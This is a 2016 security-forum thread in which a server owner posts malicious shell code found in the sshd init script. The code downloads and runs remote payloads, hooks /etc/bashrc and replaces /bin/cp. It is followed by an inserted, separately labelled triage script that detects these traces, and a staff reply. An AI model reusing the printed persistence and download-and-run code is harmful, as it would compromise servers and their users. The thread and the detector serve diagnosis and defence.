
Server Possibly Compromised

Discussion in 'Security' started by mordormx, Feb 17, 2016.

  1. mordormx (Registered; joined Nov 6, 2006; messages: 4)

    Hi guys,
    today I detected some weird lines in /etc/init.d/sshd in the start function. This is the content:

    Code:
    start()
    {
        [ -x $SSHD ] || exit 5
        [ -f /etc/ssh/sshd_config ] || exit 6
        # Create keys if necessary
        if [ "x${AUTOCREATE_SERVER_KEYS}" != xNO ]; then
            do_rsa_keygen
            if [ "x${AUTOCREATE_SERVER_KEYS}" != xRSAONLY ]; then
                do_rsa1_keygen
                do_dsa_keygen
            fi
        fi

        Inject='/etc/bashrc' #/etc/bashrc
        Bar='/bin/bar' #/bin/bar

        if [[ ! -a $Bar ]]; then
            wget http://example.com/Dynamic/g/bar >/dev/null 2>&1
            chmod 755 bar >/dev/null 2>&1
            mv bar $Bar >/dev/null 2>&1
        fi;
        if ! grep -q $Bar $Inject; then
            echo -e "$Bar >/dev/null 2>&1" >> $Inject
        fi;

        if [[ ! grep -q "example.com" /bin/cp ]]; then
            cp /bin/cp /bin/copy >/dev/null 2>&1
            echo -e '#!/bin/sh\r\nwget http://example.com/Dynamic/g/run.txt >/dev/null 2>&1\r\nmv run.txt run.php\r\nchmod +x run.php\r\nphp run.php\r\nrm -rf run.php >/dev/null 2>&1' > /bin/cp
            chmod 755 /bin/cp
        fi;
    Now the content of /bin/cp is:

    Code:
    #!/bin/bash
    Inject="/etc/bashrc" #/etc/bashrc
    Bar="/bin/bar" #/bin/bar

    if [[ ! -a $Bar ]]; then
        wget http://example.com/Dynamic/g/bar >/dev/null 2>&1
        chmod 755 bar >/dev/null 2>&1
        mv bar $Bar >/dev/null 2>&1
    fi;
    if ! grep -q "$Bar" $Inject; then
        echo -e "\n$Bar >/dev/null 2>&1" >> $Inject
    fi;
    copy
    
    Have any of you experienced this?

    Checking this URL http://example.com/Dynamic/g/run.txt, it looks like very dangerous code; now I have to research how it happened.

    Any advice or comment?
    #1 mordormx, Feb 17, 2016
    Last edited by a moderator: Feb 17, 2016
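    The post above shows a three-part persistence chain: a downloader spliced into the sshd init script, a line appended to /etc/bashrc so the dropped /bin/bar runs on every interactive login, and the real cp moved to /bin/copy with a shell script in its place. The following triage script is an added example, not code from the original thread or from cPanel; it checks for exactly those three traces against a directory tree you point it at. The ROOT parameter, the audit_root/is_script/make_fixture function names, and the fixture contents are assumptions for illustration, so it can run offline against a constructed tree (or a mounted disk image) rather than relying on tools on a host whose /bin/cp can no longer be trusted.

```shell
#!/bin/sh
# Added triage example (not from the original post): detect the persistence
# chain described above -- a downloader injected into /etc/init.d/sshd, a
# /bin/bar line appended to /etc/bashrc, and /bin/cp replaced by a script.
# ROOT is an assumed parameter so the checks can be run against a mounted
# image (or the constructed fixture below) instead of the live, untrusted host.

# is_script FILE: true if FILE starts with "#!" (a genuine cp is an ELF binary).
is_script() {
  [ "$(head -c 2 "$1" 2>/dev/null)" = "#!" ]
}

# audit_root ROOT: writes one "SUSPECT: ..." line per finding to stderr and
# prints the number of findings to stdout (0 means nothing matched).
audit_root() {
  root=$1
  n=0
  # 1. Startup and login files should never fetch remote content or
  #    reference /bin/bar (the dropped binary named in the post).
  for f in "$root/etc/init.d/sshd" "$root/etc/bashrc" "$root/etc/profile" \
           "$root/root/.bashrc"; do
    [ -f "$f" ] || continue
    if grep -qE '(^|[^[:alnum:]])(wget|curl)[[:space:]]|/bin/bar' "$f"; then
      echo "SUSPECT: $f fetches remote content or references /bin/bar" >&2
      n=$((n + 1))
    fi
  done
  # 2. Core utilities that have been swapped for shell scripts.
  for b in cp mv ls ps netstat; do
    p="$root/bin/$b"
    [ -f "$p" ] || continue
    if is_script "$p"; then
      echo "SUSPECT: $p is a script, not an ELF binary" >&2
      n=$((n + 1))
    fi
  done
  # 3. The dropped payload itself.
  if [ -e "$root/bin/bar" ]; then
    echo "SUSPECT: $root/bin/bar present" >&2
    n=$((n + 1))
  fi
  echo "$n"
}

# make_fixture compromised|clean: build a constructed directory tree that
# mimics the post's findings (or a clean host) and print its path.
make_fixture() {
  d=$(mktemp -d)
  mkdir -p "$d/etc/init.d" "$d/bin"
  case $1 in
    compromised)
      # Constructed sample: the injected part of the sshd start() function.
      cat > "$d/etc/init.d/sshd" <<'EOF'
start() {
    [ -x $SSHD ] || exit 5
    Bar='/bin/bar'
    if [[ ! -a $Bar ]]; then
        wget http://example.com/Dynamic/g/bar >/dev/null 2>&1
        mv bar $Bar >/dev/null 2>&1
    fi;
}
EOF
      printf '# constructed\n/bin/bar >/dev/null 2>&1\n' > "$d/etc/bashrc"
      printf '#!/bin/bash\ncopy\n' > "$d/bin/cp"
      printf '\177ELF' > "$d/bin/bar"
      ;;
    clean)
      printf 'start() {\n    [ -x $SSHD ] || exit 5\n}\n' > "$d/etc/init.d/sshd"
      printf '# constructed clean bashrc\n' > "$d/etc/bashrc"
      printf '\177ELF' > "$d/bin/cp"
      ;;
  esac
  echo "$d"
}

# Stand-alone run: audit both constructed trees and clean up.
for kind in compromised clean; do
  dir=$(make_fixture "$kind")
  echo "$kind fixture: $(audit_root "$dir") finding(s)"
  rm -rf "$dir"
done
```

    On a real host, run it with ROOT set to a mount point of the affected disk (for example a rescue-mode mount) and compare with the package manager's own integrity data (rpm -V openssh-server, rpm -Vf /bin/cp on RPM systems) rather than with anything executed from the suspect system; a replaced cp means every tool on that box, not only the ones checked here, is suspect.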
  2. Infopro (cPanel Sr. Product Evangelist, Staff Member; joined May 20, 2003; messages: 16,309; location: Pennsylvania; cPanel Access Level: Root Administrator)

    Please don't post actual links or domain names in your posts. Especially those to compromised servers.

    cPanel is unable to assist you with a compromised server, you should seek the assistance of a professional about this.
     